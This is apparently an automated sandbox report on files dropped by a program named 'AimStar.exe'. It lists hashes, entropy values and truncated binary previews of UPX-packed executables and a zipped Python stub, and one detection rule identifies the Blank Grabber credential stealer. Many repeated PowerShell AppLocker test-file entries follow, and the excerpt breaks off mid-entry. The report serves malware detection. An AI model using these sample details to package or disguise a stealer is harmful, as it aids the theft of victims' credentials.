                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:VfOZocB9lcRar86XqS2fUbe1F6lRiPp3UdwT6m5FmZ9UTCO:VYB9GRag6kfQe1kyx3UdzscZk
                                                                                                                                                                                                                                        MD5:9A3D3AE5745A79D276B05A85AEA02549
                                                                                                                                                                                                                                        SHA1:A5E60CAC2CA606DF4F7646D052A9C0EA813E7636
                                                                                                                                                                                                                                        SHA-256:09693BAB682495B01DE8A24C435CA5900E11D2D0F4F0807DAE278B3A94770889
                                                                                                                                                                                                                                        SHA-512:46840B820EE3C0FA511596124EB364DA993EC7AE1670843A15AFD40AC63F2C61846434BE84D191BD53F7F5F4E17FAD549795822BB2B9C792AC22A1C26E5ADF69
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.r.'.!.'.!.'.!.. .'.!.z!.'.!.. .'.!.. .'.!.. .'.!._.!.'.!... .'.!.'.!N&.!F.. -'.!F.. .'.!F.x!.'.!F.. .'.!Rich.'.!........PE..d....WOg.........." ...*.0.......0J..]e..@J..................................Pf...........`.........................................H.e......ye......pe......P]..............Gf.,............................je.(...Pje.@...........................................UPX0.....0J.............................UPX1.....0...@J..,..................@....rsrc........pe......0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):630736
                                                                                                                                                                                                                                        Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                        MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                        SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                        SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                        SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):456
                                                                                                                                                                                                                                        Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                        MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                        SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                        SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                        SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                        Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27640
                                                                                                                                                                                                                                        Entropy (8bit):7.429887403983581
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:DaWVMhw2pYjGIm9GtaJyUFRYT2Ip4HCxf1mlzzTz:OKE4jGIm9GtmyUzR9YfIPv
                                                                                                                                                                                                                                        MD5:933DA5361079FC8457E19ADAB86FF4E0
                                                                                                                                                                                                                                        SHA1:51BCCF47008130BAADD49A3F55F85FE968177233
                                                                                                                                                                                                                                        SHA-256:ADFDF84FF4639F8A921B78A2EFCE1B89265DF2B512DF05CE2859FC3CC6E33EFF
                                                                                                                                                                                                                                        SHA-512:0078CD5DF1B78D51B0ACB717E051E83CB18A9DAF499A959DA84A331FA7A839EEFA303672D741B29FF2E0C34D1EF3F07505609F1102E9E86FAB1C9FD066C67570
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ks{.*.(.*.(.*.(.R.(.*.(..).*.(..).*.(..).*.(..).*.(w..).*.(.*.(.*.(...).*.(w..).*.(w..).*.(w..(.*.(w..).*.(Rich.*.(................PE..d....WOg.........." ...*.0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):219904
                                                                                                                                                                                                                                        Entropy (8bit):7.886054749844031
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:mJI949SB5t+JhJLoB3UhtuSmLCzAFUn8CPlZGmW7KnuuMElFNxpVuQjYMSQxJUC:gI94wXt+SUjx8OlTW7GfnhV1kMpxJD
                                                                                                                                                                                                                                        MD5:0FD870F47255E0D459BB1C6C1B3DF537
                                                                                                                                                                                                                                        SHA1:9DDF0F72470A06D09CF86FA578300550611461CB
                                                                                                                                                                                                                                        SHA-256:96AF393C8A8E46AF7FD89C8D06CAB36B2212CD3CDB51A9368B55ED37B9CC9733
                                                                                                                                                                                                                                        SHA-512:E85760435AF1956753E6FCFD9119934EACB1D6AA65833E09B977E8C79E97EDC4A66585086EDDF861ED3EC6B953FA0FCA935748E2B097493447B3FAE91E6AEBDD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........#.!Z.K.i.Z...Z......stub-o.pyc........2atg..............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):661360
                                                                                                                                                                                                                                        Entropy (8bit):7.993016249967087
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:fnhOhXqE88i5E+P5p6YOU7hN8QtcsWO4qlD0kHpM7rLXF81PrtKtD1Gj40QeqG+e:fnWaI6lP5+whKQusF44ZQ3sZKt1n0QC/
                                                                                                                                                                                                                                        MD5:FF62332FA199145AAF12314DBF9841A3
                                                                                                                                                                                                                                        SHA1:714A50B5351D5C8AFDDB16A4E51A8998F976DA65
                                                                                                                                                                                                                                        SHA-256:36E1C70AFC8AD8AFE4A4F3EF4F133390484BCA4EA76941CC55BAC7E9DF29EEFD
                                                                                                                                                                                                                                        SHA-512:EEFF68432570025550D4C205ABF585D2911E0FF59B6ECA062DD000087F96C7896BE91EDA7612666905445627FC3FC974AEA7C3428A708C7DE2CA14C7BCE5CCA5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7.x.7.x.7.x.>..;.x.&(y.5.x.&({.3.x.&(|.?.x.&(}.:.x.E/y.4.x.7.y...x..(p.6.x..(x.6.x..(..6.x..(z.6.x.Rich7.x.........................PE..d....WOg.........." ...*.....0............................................................`..............................................#..............................................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):269032
                                                                                                                                                                                                                                        Entropy (8bit):7.980717016340488
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:vFHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khEc9v:vtJlyHwqSBqpNsKUuntFJhMF9HC84v
                                                                                                                                                                                                                                        MD5:867ECDE9FF7F92D375165AE5F3C439CB
                                                                                                                                                                                                                                        SHA1:37D1AC339EB194CE98548AB4E4963FE30EA792AE
                                                                                                                                                                                                                                        SHA-256:A2061EF4DF5999CA0498BEE2C7DD321359040B1ACF08413C944D468969C27579
                                                                                                                                                                                                                                        SHA-512:0DCE05D080E59F98587BCE95B26A3B5D7910D4CB5434339810E2AAE8CFE38292F04C3B706FCD84957552041D4D8C9F36A1844A856D1729790160CEF296DCCFC2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..Q&...&...&.../fY. ...7...$...7...%...7.......7...+.......%...T...$...&...i.......'.......'.....5.'.......'...Rich&...................PE..d....WOg.........." ...*.........0..0....@...................................0............`..........................................+..X....)....... .......................+..$...................................0...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
